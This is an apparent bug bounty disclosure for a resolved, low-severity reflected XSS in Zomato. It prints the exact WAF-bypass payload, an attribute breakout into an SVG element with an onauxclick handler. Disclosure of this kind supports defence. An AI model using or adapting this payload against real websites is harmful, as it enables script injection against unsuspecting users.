HTML injection leads to reflected XSS
Low
Zomato
Team Summary
Official summary from Zomato
The following payload was used to bypass the WAF:

```html
"><svg height="1000" width="1000" onauxclick=confirm`12233`>
  <circle cx="500" cy="500" r="400" stroke="black" stroke-width="3" fill="red" />
</svg>
```
Reported by
haxor5392
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$150.00
Submitted
Weakness
Code Injection